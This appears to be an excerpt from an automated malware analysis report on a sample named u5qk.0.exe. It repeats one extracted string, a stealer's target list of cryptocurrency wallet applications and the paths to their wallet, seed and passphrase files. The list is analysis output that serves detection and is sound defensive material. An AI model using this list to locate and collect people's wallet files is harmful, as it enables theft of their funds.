Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
